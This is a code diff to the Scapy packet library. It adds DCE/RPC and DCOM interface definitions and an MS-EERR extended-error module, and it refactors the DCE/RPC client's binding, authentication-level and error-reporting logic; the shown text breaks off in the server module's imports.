+IACTIVATION_OPNUMS = {0: DceRpcOp(RemoteActivation_Request, RemoteActivation_Response)} +register_dcerpc_interface( + name="IActivation", + uuid=uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57"), + version="0.0", + opnums=IACTIVATION_OPNUMS, +) + + +class RemoteGetClassObject_Request(NDRPacket): + fields_desc = [ + NDRPacketField("orpcthis", ORPCTHIS(), ORPCTHIS), + NDRFullPointerField( + NDRPacketField("pActProperties", MInterfacePointer(), MInterfacePointer) + ), + ] + + +class RemoteGetClassObject_Response(NDRPacket): + fields_desc = [ + NDRPacketField("orpcthat", ORPCTHAT(), ORPCTHAT), + NDRFullPointerField( + NDRPacketField("ppActProperties", MInterfacePointer(), MInterfacePointer) + ), + NDRIntField("status", 0), + ] + + +class RemoteCreateInstance_Request(NDRPacket): + fields_desc = [ + NDRPacketField("orpcthis", ORPCTHIS(), ORPCTHIS), + NDRFullPointerField( + NDRPacketField("pUnkOuter", MInterfacePointer(), MInterfacePointer) + ), + NDRFullPointerField( + NDRPacketField("pActProperties", MInterfacePointer(), MInterfacePointer) + ), + ] + + +class RemoteCreateInstance_Response(NDRPacket): + fields_desc = [ + NDRPacketField("orpcthat", ORPCTHAT(), ORPCTHAT), + NDRFullPointerField( + NDRPacketField("ppActProperties", MInterfacePointer(), MInterfacePointer) + ), + NDRIntField("status", 0), + ] + + +IREMOTESCMACTIVATOR_OPNUMS = { # 0: Opnum0NotUsedOnWire, + # 1: Opnum1NotUsedOnWire, + # 2: Opnum2NotUsedOnWire, + 3: DceRpcOp(RemoteGetClassObject_Request, RemoteGetClassObject_Response), + 4: DceRpcOp(RemoteCreateInstance_Request, RemoteCreateInstance_Response), +} +register_dcerpc_interface( + name="IRemoteSCMActivator", + uuid=uuid.UUID("000001A0-0000-0000-C000-000000000046"), + version="0.0", + opnums=IREMOTESCMACTIVATOR_OPNUMS, +) + + +class ResolveOxid_Request(NDRPacket): + fields_desc = [ + NDRLongField("pOxid", 0), + NDRShortField("cRequestedProtseqs", None, size_of="arRequestedProtseqs"), + NDRConfFieldListField( + "arRequestedProtseqs", + [], + NDRShortField("", 0), + size_is=lambda pkt: pkt.cRequestedProtseqs, + ), + ] + + +class ResolveOxid_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField("ppdsaOxidBindings", DUALSTRINGARRAY(), DUALSTRINGARRAY) + ), + NDRPacketField("pipidRemUnknown", GUID(), GUID), + NDRIntField("pAuthnHint", 0), + NDRIntField("status", 0), + ] + + +class SimplePing_Request(NDRPacket): + fields_desc = [NDRLongField("pSetId", 0)] + + +class SimplePing_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class ComplexPing_Request(NDRPacket): + fields_desc = [ + NDRLongField("pSetId", 0), + NDRShortField("SequenceNum", 0), + NDRShortField("cAddToSet", None, size_of="AddToSet"), + NDRShortField("cDelFromSet", None, size_of="DelFromSet"), + NDRConfFieldListField( + "AddToSet", [], NDRLongField("", 0), size_is=lambda pkt: pkt.cAddToSet + ), + NDRConfFieldListField( + "DelFromSet", [], NDRLongField("", 0), size_is=lambda pkt: pkt.cDelFromSet + ), + ] + + +class ComplexPing_Response(NDRPacket): + fields_desc = [ + NDRLongField("pSetId", 0), + NDRShortField("pPingBackoffFactor", 0), + NDRIntField("status", 0), + ] + + class ServerAlive_Request(NDRPacket): fields_desc = [] @@ -138,6 +318,31 @@ class ServerAlive_Response(NDRPacket): fields_desc = [NDRIntField("status", 0)] +class ResolveOxid2_Request(NDRPacket): + fields_desc = [ + NDRLongField("pOxid", 0), + NDRShortField("cRequestedProtseqs", None, size_of="arRequestedProtseqs"), + NDRConfFieldListField( + "arRequestedProtseqs", + [], + NDRShortField("", 0), + size_is=lambda pkt: pkt.cRequestedProtseqs, + ), + ] + + +class ResolveOxid2_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField("ppdsaOxidBindings", DUALSTRINGARRAY(), DUALSTRINGARRAY) + ), + NDRPacketField("pipidRemUnknown", GUID(), GUID), + NDRIntField("pAuthnHint", 0), + NDRPacketField("pComVersion", COMVERSION(), COMVERSION), + NDRIntField("status", 0), + ] + + class ServerAlive2_Request(NDRPacket): fields_desc = [] @@ -154,7 +359,11 @@ class ServerAlive2_Response(NDRPacket): IOBJECTEXPORTER_OPNUMS = { + 0: DceRpcOp(ResolveOxid_Request, ResolveOxid_Response), + 1: DceRpcOp(SimplePing_Request, SimplePing_Response), + 2: DceRpcOp(ComplexPing_Request, ComplexPing_Response), 3: DceRpcOp(ServerAlive_Request, ServerAlive_Response), + 4: DceRpcOp(ResolveOxid2_Request, ResolveOxid2_Response), 5: DceRpcOp(ServerAlive2_Request, ServerAlive2_Response), } register_dcerpc_interface( @@ -163,3 +372,141 @@ class ServerAlive2_Response(NDRPacket): version="0.0", opnums=IOBJECTEXPORTER_OPNUMS, ) +IUNKNOWN_OPNUMS = { # 0: Opnum0NotUsedOnWire, + # 1: Opnum1NotUsedOnWire, + # 2: Opnum2NotUsedOnWire +} +register_com_interface( + name="IUnknown", + uuid=uuid.UUID("00000000-0000-0000-C000-000000000046"), + opnums=IUNKNOWN_OPNUMS, +) + + +class STDOBJREF(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRIntField("flags", 0), + NDRIntField("cPublicRefs", 0), + NDRLongField("oxid", 0), + NDRLongField("oid", 0), + NDRPacketField("ipid", GUID(), GUID), + ] + + +class REMQIRESULT(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRSignedIntField("hResult", 0), + NDRPacketField("std", STDOBJREF(), STDOBJREF), + ] + + +class RemQueryInterface_Request(NDRPacket): + fields_desc = [ + NDRPacketField("ripid", GUID(), GUID), + NDRIntField("cRefs", 0), + NDRShortField("cIids", None, size_of="iids"), + NDRConfPacketListField("iids", [], GUID, size_is=lambda pkt: pkt.cIids), + ] + + +class RemQueryInterface_Response(NDRPacket): + fields_desc = [ + NDRConfPacketListField( + "ppQIResults", [], REMQIRESULT, size_is=lambda pkt: pkt.cIids, ptr_pack=True + ), + NDRIntField("status", 0), + ] + + +class REMINTERFACEREF(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRPacketField("ipid", GUID(), GUID), + NDRIntField("cPublicRefs", 0), + NDRIntField("cPrivateRefs", 0), + ] + + +class RemAddRef_Request(NDRPacket): + fields_desc = [ + NDRShortField("cInterfaceRefs", None, size_of="InterfaceRefs"), + NDRConfPacketListField( + "InterfaceRefs", [], REMINTERFACEREF, size_is=lambda pkt: pkt.cInterfaceRefs + ), + ] + + +class RemAddRef_Response(NDRPacket): + fields_desc = [ + NDRConfFieldListField( + "pResults", + [], + NDRSignedIntField("", 0), + size_is=lambda pkt: pkt.cInterfaceRefs, + ), + NDRIntField("status", 0), + ] + + +class RemRelease_Request(NDRPacket): + fields_desc = [ + NDRShortField("cInterfaceRefs", None, size_of="InterfaceRefs"), + NDRConfPacketListField( + "InterfaceRefs", [], REMINTERFACEREF, size_is=lambda pkt: pkt.cInterfaceRefs + ), + ] + + +class RemRelease_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +IREMUNKNOWN_OPNUMS = { # 0: Opnum0NotUsedOnWire, + # 1: Opnum1NotUsedOnWire, + # 2: Opnum2NotUsedOnWire, + 3: DceRpcOp(RemQueryInterface_Request, RemQueryInterface_Response), + 4: DceRpcOp(RemAddRef_Request, RemAddRef_Response), + 5: DceRpcOp(RemRelease_Request, RemRelease_Response), +} +register_com_interface( + name="IRemUnknown", + uuid=uuid.UUID("00000131-0000-0000-C000-000000000046"), + opnums=IREMUNKNOWN_OPNUMS, +) + + +class RemQueryInterface2_Request(NDRPacket): + fields_desc = [ + NDRPacketField("ripid", GUID(), GUID), + NDRShortField("cIids", None, size_of="iids"), + NDRConfPacketListField("iids", [], GUID, size_is=lambda pkt: pkt.cIids), + ] + + +class RemQueryInterface2_Response(NDRPacket): + fields_desc = [ + NDRConfFieldListField( + "phr", [], NDRSignedIntField("", 0), size_is=lambda pkt: pkt.cIids + ), + NDRConfPacketListField( + "ppMIF", [], MInterfacePointer, size_is=lambda pkt: pkt.cIids, ptr_pack=True + ), + NDRIntField("status", 0), + ] + + +IREMUNKNOWN2_OPNUMS = { # 0: Opnum0NotUsedOnWire, + # 1: Opnum1NotUsedOnWire, + # 2: Opnum2NotUsedOnWire, + 3: DceRpcOp(RemQueryInterface_Request, RemQueryInterface_Response), + 4: DceRpcOp(RemAddRef_Request, RemAddRef_Response), + 5: DceRpcOp(RemRelease_Request, RemRelease_Response), + 6: DceRpcOp(RemQueryInterface2_Request, RemQueryInterface2_Response), +} +register_com_interface( + name="IRemUnknown2", + uuid=uuid.UUID("00000143-0000-0000-C000-000000000046"), + opnums=IREMUNKNOWN2_OPNUMS, +) diff --git a/scapy/layers/msrpce/raw/ms_eerr.py b/scapy/layers/msrpce/raw/ms_eerr.py new file mode 100644 index 00000000000..1d0aad982aa --- /dev/null +++ b/scapy/layers/msrpce/raw/ms_eerr.py @@ -0,0 +1,194 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy RPC +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +# [ms-eerr] v16.0 (Tue, 23 Apr 2024) + +""" +RPC definitions for the following interfaces: +- +This file is auto-generated by midl-to-scapy, do not modify. +""" + +from enum import IntEnum +import uuid + +from scapy.fields import StrFixedLenField +from scapy.layers.dcerpc import ( + NDRPacket, + NDRConfPacketListField, + NDRConfStrLenField, + NDRConfStrLenFieldUtf16, + NDRFullEmbPointerField, + NDRInt3264EnumField, + NDRIntField, + NDRPacketField, + NDRRecursiveClass, + NDRShortField, + NDRSignedIntField, + NDRSignedLongField, + NDRSignedShortField, + NDRUnionField, +) + + +class EEAString(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nLength", None, size_of="pString"), + NDRFullEmbPointerField( + NDRConfStrLenField("pString", "", size_is=lambda pkt: pkt.nLength) + ), + ] + + +class EEUString(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nLength", None, size_of="pString"), + NDRFullEmbPointerField( + NDRConfStrLenFieldUtf16("pString", "", size_is=lambda pkt: pkt.nLength) + ), + ] + + +class BinaryEEInfo(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nSize", None, size_of="pBlob"), + NDRFullEmbPointerField( + NDRConfStrLenField("pBlob", "", size_is=lambda pkt: pkt.nSize) + ), + ] + + +class ExtendedErrorParamTypesInternal(IntEnum): + eeptiAnsiString = 1 + eeptiUnicodeString = 2 + eeptiLongVal = 3 + eeptiShortValue = 4 + eeptiPointerValue = 5 + eeptiNone = 6 + eeptiBinary = 7 + + +class ExtendedErrorParam(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, ExtendedErrorParamTypesInternal), + NDRUnionField( + [ + ( + NDRPacketField("value", EEAString(), EEAString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRPacketField("value", EEUString(), EEUString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ( + NDRSignedIntField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ( + NDRSignedShortField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 4), + (lambda _, val: val.tag == 4), + ), + ), + ( + NDRSignedLongField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 5), + (lambda _, val: val.tag == 5), + ), + ), + ( + StrFixedLenField("value", "", length=0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 6), + (lambda _, val: val.tag == 6), + ), + ), + ( + NDRPacketField("value", BinaryEEInfo(), BinaryEEInfo), + ( + (lambda pkt: getattr(pkt, "Type", None) == 7), + (lambda _, val: val.tag == 7), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class EEComputerNamePresent(IntEnum): + eecnpPresent = 1 + eecnpNotPresent = 2 + + +class EEComputerName(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, EEComputerNamePresent), + NDRUnionField( + [ + ( + NDRPacketField("value", EEUString(), EEUString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + StrFixedLenField("value", "", length=0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class ExtendedErrorInfo(NDRPacket): + ALIGNMENT = (8, 8) + DEPORTED_CONFORMANTS = ["Params"] + fields_desc = [ + NDRFullEmbPointerField( + NDRPacketField("Next", None, NDRRecursiveClass("ExtendedErrorInfo")) + ), + NDRPacketField("ComputerName", EEComputerName(), EEComputerName), + NDRIntField("ProcessID", 0), + NDRSignedLongField("TimeStamp", 0), + NDRIntField("GeneratingComponent", 0), + NDRIntField("Status", 0), + NDRShortField("DetectionLocation", 0), + NDRShortField("Flags", 0), + NDRSignedShortField("nLen", None, size_of="Params"), + NDRConfPacketListField( + "Params", + [], + ExtendedErrorParam, + size_is=lambda pkt: pkt.nLen, + conformant_in_struct=True, + ), + ] diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 6e81221dfec..a25f6587126 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -11,9 +11,16 @@ import socket from scapy.config import conf +from scapy.error import log_runtime from scapy.layers.dcerpc import ( + _DCE_RPC_ERROR_CODES, + ComInterface, + CommonAuthVerifier, + DCE_C_AUTHN_LEVEL, + DCERPC_Transport, DceRpc5, + DceRpc5AbstractSyntax, DceRpc5AlterContext, DceRpc5AlterContextResp, DceRpc5Auth3, @@ -24,16 +31,16 @@ DceRpc5Fault, DceRpc5Request, DceRpc5Response, - DceRpc5AbstractSyntax, DceRpc5TransferSyntax, + DceRpcInterface, + DceRpcSecVT, + DceRpcSecVTCommand, + DceRpcSecVTPcontext, + DceRpcSession, DceRpcSocket, - DCERPC_Transport, find_dcerpc_interface, - CommonAuthVerifier, - DCE_C_AUTHN_LEVEL, - # NDR - NDRPointer, NDRContextHandle, + NDRPointer, ) from scapy.layers.gssapi import ( SSP, @@ -57,30 +64,62 @@ UUID, ) +# Typing +from typing import ( + Optional, + Union, +) + class DCERPC_Client(object): """ A basic DCE/RPC client - :param ndr64: Should ask for NDR64 when binding (default False) + :param transport: the transport to use. + :param ndr64: should ask for NDR64 when binding (default conf.ndr64) + :param ndrendian: the endianness to use (default little) + :param verb: enable verbose logging (default True) + :param auth_level: the DCE_C_AUTHN_LEVEL to use """ - def __init__(self, transport, ndr64=False, ndrendian="little", verb=True, **kwargs): + def __init__( + self, + transport: DCERPC_Transport, + ndr64: Optional[bool] = None, + ndrendian: str = "little", + verb: bool = True, + auth_level: Optional[DCE_C_AUTHN_LEVEL] = None, + auth_context_id: int = 0, + **kwargs, + ): self.sock = None self.transport = transport assert isinstance( transport, DCERPC_Transport ), "transport must be from DCERPC_Transport" + + # Counters self.call_id = 0 - self.cont_id = 0 - self.ndr64 = ndr64 + self.all_cont_id = 0 # number of contexts sent + + # Session parameters + if ndr64 is None: + ndr64 = conf.ndr64 + self.ndr64: bool = ndr64 self.ndrendian = ndrendian self.verb = verb - self.host = None - self.auth_level = kwargs.pop("auth_level", DCE_C_AUTHN_LEVEL.NONE) - self.auth_context_id = kwargs.pop("auth_context_id", 0) + self.host: str = None + self.port: int = -1 self.ssp = kwargs.pop("ssp", None) # type: SSP self.sspcontext = None + if auth_level is not None: + self.auth_level = auth_level + elif self.ssp is not None: + self.auth_level = DCE_C_AUTHN_LEVEL.CONNECT + else: + self.auth_level = DCE_C_AUTHN_LEVEL.NONE + self.auth_context_id = auth_context_id + self._first_time_on_interface = True self.dcesockargs = kwargs self.dcesockargs["transport"] = self.transport @@ -101,9 +140,17 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): ) return client + @property + def session(self) -> DceRpcSession: + return self.sock.session + def connect(self, host, port=None, timeout=5, smb_kwargs={}): """ - Initiate a connection + Initiate a connection. + + :param host: the host to connect to + :param port: (optional) the port to connect to + :param timeout: (optional) the connection timeout (default 5) """ if port is None: if self.transport == DCERPC_Transport.NCACN_IP_TCP: # IP/TCP @@ -115,6 +162,7 @@ def connect(self, host, port=None, timeout=5, smb_kwargs={}): "Can't guess the port for transport: %s" % self.transport ) self.host = host + self.port = port sock = socket.socket() sock.settimeout(timeout) if self.verb: @@ -146,11 +194,19 @@ def connect(self, host, port=None, timeout=5, smb_kwargs={}): ) def close(self): + """ + Close the DCE/RPC client. + """ if self.verb: print("X Connection closed\n") self.sock.close() def sr1(self, pkt, **kwargs): + """ + Send/Receive a DCE/RPC message. + + The DCE/RPC header is added automatically. + """ self.call_id += 1 pkt = ( DceRpc5( @@ -158,14 +214,23 @@ def sr1(self, pkt, **kwargs): pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), + vt_trailer=kwargs.pop("vt_trailer", None), ) / pkt ) if "pfc_flags" in kwargs: pkt.pfc_flags = kwargs.pop("pfc_flags") + if "objectuuid" in kwargs: + pkt.pfc_flags += "PFC_OBJECT_UUID" + pkt.object = kwargs.pop("objectuuid") return self.sock.sr1(pkt, verbose=0, **kwargs) def send(self, pkt, **kwargs): + """ + Send a DCE/RPC message. + + The DCE/RPC header is added automatically. + """ self.call_id += 1 pkt = ( DceRpc5( @@ -173,60 +238,119 @@ def send(self, pkt, **kwargs): pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), + vt_trailer=kwargs.pop("vt_trailer", None), ) / pkt ) if "pfc_flags" in kwargs: pkt.pfc_flags = kwargs.pop("pfc_flags") + if "objectuuid" in kwargs: + pkt.pfc_flags += "PFC_OBJECT_UUID" + pkt.object = kwargs.pop("objectuuid") return self.sock.send(pkt, **kwargs) def sr1_req(self, pkt, **kwargs): + """ + Send/Receive a DCE/RPC request. + + :param pkt: the inner DCE/RPC message, without any header. + """ if self.verb: - print(conf.color_theme.opening(">> REQUEST: %s" % pkt.__class__.__name__)) + if "objectuuid" in kwargs: + # COM + print( + conf.color_theme.opening( + ">> REQUEST (COM): %s" % pkt.payload.__class__.__name__ + ) + ) + else: + print( + conf.color_theme.opening(">> REQUEST: %s" % pkt.__class__.__name__) + ) + # Add sectrailer if first time talking on this interface + vt_trailer = b"" + if ( + self._first_time_on_interface + and self.transport != DCERPC_Transport.NCACN_NP + ): + # In the first request after a bind, Windows sends a trailer to verify + # that the negotiated transfer/interface wasn't altered. + self._first_time_on_interface = False + vt_trailer = DceRpcSecVT( + commands=[ + DceRpcSecVTCommand(SEC_VT_COMMAND_END=1) + / DceRpcSecVTPcontext( + InterfaceId=self.session.rpc_bind_interface.uuid, + TransferSyntax="NDR64" if self.ndr64 else "NDR 2.0", + TransferVersion=1 if self.ndr64 else 2, + ) + ] + ) + + # Optional: force opnum + opnum = {} + if "opnum" in kwargs: + opnum["opnum"] = kwargs.pop("opnum") + # Send/receive resp = self.sr1( - DceRpc5Request(cont_id=self.cont_id, alloc_hint=len(pkt)) / pkt, + DceRpc5Request( + cont_id=self.session.cont_id, + alloc_hint=len(pkt) + len(vt_trailer), + **opnum, + ) + / pkt, + vt_trailer=vt_trailer, **kwargs, ) + + # Parse result + result = None if DceRpc5Response in resp: if self.verb: - print( - conf.color_theme.success( - "<< RESPONSE: %s" - % (resp[DceRpc5Response].payload.__class__.__name__) - ) - ) - return resp[DceRpc5Response].payload - else: - if self.verb: - if DceRpc5Fault in resp: - if resp[DceRpc5Fault].payload and not isinstance( - resp[DceRpc5Fault].payload, conf.raw_layer - ): - resp[DceRpc5Fault].payload.show() - if resp.status == 0x00000005: - print(conf.color_theme.fail("! nca_s_fault_access_denied")) - elif resp.status == 0x00000721: - print( - conf.color_theme.fail( - "! nca_s_fault_sec_pkg_error " - "(error in checksum/encryption)" - ) + if "objectuuid" in kwargs: + # COM + print( + conf.color_theme.success( + "<< RESPONSE (COM): %s" + % (resp[DceRpc5Response].payload.payload.__class__.__name__) ) - else: - print( - conf.color_theme.fail( - "! %s" % STATUS_ERREF.get(resp.status, "Failure") - ) + ) + else: + print( + conf.color_theme.success( + "<< RESPONSE: %s" + % (resp[DceRpc5Response].payload.__class__.__name__) ) - resp.show() - return - return resp + ) + result = resp[DceRpc5Response].payload + elif DceRpc5Fault in resp: + if self.verb: + print(conf.color_theme.success("<< FAULT")) + # If [MS-EERR] is loaded, show the extended info + if resp[DceRpc5Fault].payload and not isinstance( + resp[DceRpc5Fault].payload, conf.raw_layer + ): + resp[DceRpc5Fault].payload.show() + result = resp + if self.verb and getattr(resp, "status", 0) != 0: + if resp.status in _DCE_RPC_ERROR_CODES: + print(conf.color_theme.fail(f"! {_DCE_RPC_ERROR_CODES[resp.status]}")) + elif resp.status in STATUS_ERREF: + print(conf.color_theme.fail(f"! {STATUS_ERREF[resp.status]}")) + else: + print(conf.color_theme.fail("! Failure")) + resp.show() + return result - def get_bind_context(self, interface): - return [ + def _get_bind_context(self, interface): + """ + Internal: get the bind DCE/RPC context. + """ + # NDR 2.0 + contexts = [ DceRpc5Context( - cont_id=0, + cont_id=self.all_cont_id, abstract_syntax=DceRpc5AbstractSyntax( if_uuid=interface.uuid, if_version=interface.if_version, @@ -239,10 +363,14 @@ def get_bind_context(self, interface): ) ], ), - ] + ( - [ + ] + self.all_cont_id += 1 + + # NDR64 + if self.ndr64: + contexts.append( DceRpc5Context( - cont_id=1, + cont_id=self.all_cont_id, abstract_syntax=DceRpc5AbstractSyntax( if_uuid=interface.uuid, if_version=interface.if_version, @@ -254,26 +382,34 @@ def get_bind_context(self, interface): if_version=1, ) ], + ) + ) + self.all_cont_id += 1 + + # BindTimeFeatureNegotiationBitmask + contexts.append( + DceRpc5Context( + cont_id=self.all_cont_id, + abstract_syntax=DceRpc5AbstractSyntax( + if_uuid=interface.uuid, + if_version=interface.if_version, ), - DceRpc5Context( - cont_id=2, - abstract_syntax=DceRpc5AbstractSyntax( - if_uuid=interface.uuid, - if_version=interface.if_version, - ), - transfer_syntaxes=[ - DceRpc5TransferSyntax( - if_uuid=uuid.UUID("6cb71c2c-9812-4540-0300-000000000000"), - if_version=1, - ) - ], - ), - ] - if self.ndr64 - else [] + transfer_syntaxes=[ + DceRpc5TransferSyntax( + if_uuid=uuid.UUID("6cb71c2c-9812-4540-0300-000000000000"), + if_version=1, + ) + ], + ) ) + self.all_cont_id += 1 - def _bind(self, interface, reqcls, respcls): + return contexts + + def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls): + """ + Internal: used to send a bind/alter request + """ # Build a security context: [MS-RPCE] 3.3.1.5.2 if self.verb: print( @@ -282,14 +418,16 @@ def _bind(self, interface, reqcls, respcls): + (" (with %s)" % self.ssp.__class__.__name__ if self.ssp else "") ) ) + # Do we need an authenticated bind if not self.ssp or ( - self.transport == DCERPC_Transport.NCACN_NP + self.sspcontext is not None + or self.transport == DCERPC_Transport.NCACN_NP and self.auth_level < DCE_C_AUTHN_LEVEL.PKT_INTEGRITY ): # NCACN_NP = SMB without INTEGRITY/PRIVACY does not bind the RPC securely, # again as it has already authenticated during the SMB Session Setup resp = self.sr1( - reqcls(context_elem=self.get_bind_context(interface)), + reqcls(context_elem=self._get_bind_context(interface)), auth_verifier=None, ) status = GSS_S_COMPLETE @@ -322,7 +460,7 @@ def _bind(self, interface, reqcls, respcls): self.sspcontext.clifailure() return False resp = self.sr1( - reqcls(context_elem=self.get_bind_context(interface)), + reqcls(context_elem=self._get_bind_context(interface)), auth_verifier=( None if not self.sspcontext @@ -338,8 +476,7 @@ def _bind(self, interface, reqcls, respcls): + ( # If the SSP supports "Header Signing", advertise it "+PFC_SUPPORT_HEADER_SIGN" - if self.ssp is not None - and self.sock.session.support_header_signing + if self.ssp is not None and self.session.support_header_signing else "" ) ), @@ -376,7 +513,7 @@ def _bind(self, interface, reqcls, respcls): respcls = DceRpc5AlterContextResp resp = self.sr1( DceRpc5AlterContext( - context_elem=self.get_bind_context(interface) + context_elem=self._get_bind_context(interface) ), auth_verifier=CommonAuthVerifier( auth_type=self.ssp.auth_type, @@ -396,6 +533,8 @@ def _bind(self, interface, reqcls, respcls): token=resp.auth_verifier.auth_value, target_name="host/" + self.host, ) + else: + log_runtime.error("GSS_Init_sec_context failed with %s !" % status) # Check context acceptance if ( status == GSS_S_COMPLETE @@ -404,15 +543,17 @@ def _bind(self, interface, reqcls, respcls): ): self.call_id = 0 # reset call id port = resp.sec_addr.port_spec.decode() - ndr = self.sock.session.ndr64 and "NDR64" or "NDR32" - self.cont_id = int(self.sock.session.ndr64) # ctx 0 for NDR32, 1 for NDR64 + ndr = self.session.ndr64 and "NDR64" or "NDR32" + self.ndr64 = self.session.ndr64 + self.cont_id = int(self.session.ndr64) # ctx 0 for NDR32, 1 for NDR64 if self.verb: print( conf.color_theme.success( f"<< {respcls.__name__} port '{port}' using {ndr}" ) ) - self.sock.session.sspcontext = self.sspcontext + self.session.sspcontext = self.sspcontext + self._first_time_on_interface = True return True else: if self.verb: @@ -427,22 +568,20 @@ def _bind(self, interface, reqcls, respcls): ): resp[DceRpc5BindNak].payload.show() elif DceRpc5Fault in resp: - if resp.status == 0x00000005: - print(conf.color_theme.fail("! nca_s_fault_access_denied")) - elif resp.status == 0x00000721: - print( - conf.color_theme.fail( - "! nca_s_fault_sec_pkg_error " - "(error in checksum/encryption)" + if getattr(resp, "status", 0) != 0: + if resp.status in _DCE_RPC_ERROR_CODES: + print( + conf.color_theme.fail( + f"! {_DCE_RPC_ERROR_CODES[resp.status]}" + ) ) - ) - else: - print( - conf.color_theme.fail( - "! %s" % STATUS_ERREF.get(resp.status, "Failure") + elif resp.status in STATUS_ERREF: + print( + conf.color_theme.fail(f"! {STATUS_ERREF[resp.status]}") ) - ) - resp.show() + else: + print(conf.color_theme.fail("! Failure")) + resp.show() if DceRpc5Fault in resp: if resp[DceRpc5Fault].payload and not isinstance( resp[DceRpc5Fault].payload, conf.raw_layer @@ -453,32 +592,40 @@ def _bind(self, interface, reqcls, respcls): resp.show() return False - def bind(self, interface): + def bind(self, interface: Union[DceRpcInterface, ComInterface]): """ Bind the client to an interface + + :param interface: the DceRpcInterface object """ return self._bind(interface, DceRpc5Bind, DceRpc5BindAck) - def alter_context(self, interface): + def alter_context(self, interface: Union[DceRpcInterface, ComInterface]): """ Alter context: post-bind context negotiation + + :param interface: the DceRpcInterface object """ return self._bind(interface, DceRpc5AlterContext, DceRpc5AlterContextResp) - def bind_or_alter(self, interface): + def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]): """ Bind the client to an interface or alter the context if already bound + + :param interface: the DceRpcInterface object """ - if not self.sock.session.rpc_bind_interface: + if not self.session.rpc_bind_interface: # No interface is bound self.bind(interface) - else: + elif self.session.rpc_bind_interface != interface: # An interface is already bound self.alter_context(interface) - def open_smbpipe(self, name): + def open_smbpipe(self, name: str): """ - Open a certain filehandle with the SMB automaton + Open a certain filehandle with the SMB automaton. + + :param name: the name of the pipe """ self.ipc_tid = self.smbrpcsock.tree_connect("IPC$") self.smbrpcsock.open_pipe(name) @@ -493,15 +640,20 @@ def close_smbpipe(self): def connect_and_bind( self, - ip, - interface, - port=None, - timeout=5, + ip: str, + interface: DceRpcInterface, + port: Optional[int] = None, + timeout: int = 5, smb_kwargs={}, ): """ Asks the Endpoint Mapper what address to use to connect to the interface, then uses connect() followed by a bind() + + :param ip: the ip to connect to + :param interface: the DceRpcInterface object + :param port: (optional, NCACN_NP only) the port to connect to + :param timeout: (optional) the connection timeout (default 5) """ if self.transport == DCERPC_Transport.NCACN_IP_TCP: # IP/TCP @@ -517,7 +669,7 @@ def connect_and_bind( else: return # 2. Connect to that IP:PORT - self.connect(ip, port=port) + self.connect(ip, port=port, timeout=timeout) elif self.transport == DCERPC_Transport.NCACN_NP: # SMB # 1. ask the endpoint mapper (over SMB) for the namedpipe @@ -693,6 +845,7 @@ def get_endpoint( transport=DCERPC_Transport.NCACN_IP_TCP, ndrendian="little", verb=True, + ssp=None, smb_kwargs={}, ): """ @@ -702,6 +855,7 @@ def get_endpoint( :param interface: :param mode: :param verb: + :param ssp: :return: a list of connection tuples for this interface """ @@ -710,6 +864,7 @@ def get_endpoint( ndr64=False, ndrendian=ndrendian, verb=verb, + ssp=ssp, ) # EPM only works with NDR32 client.connect(ip, smb_kwargs=smb_kwargs) if transport == DCERPC_Transport.NCACN_NP: # SMB diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index 807f111d0c9..5a8435cac17 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -17,22 +17,23 @@ from scapy.volatile import RandShort from scapy.layers.dcerpc import ( + CommonAuthVerifier, + DCE_RPC_INTERFACES, + DCERPC_Transport, DceRpc5, - DceRpcSession, + DceRpc5AlterContext, + DceRpc5AlterContextResp, + DceRpc5Auth3, DceRpc5Bind, DceRpc5BindAck, DceRpc5BindNak, - DceRpc5Auth3, - DceRpc5AlterContext, - DceRpc5AlterContextResp, - DceRpc5Result, + DceRpc5PortAny, DceRpc5Request, DceRpc5Response, + DceRpc5Result, DceRpc5TransferSyntax, - 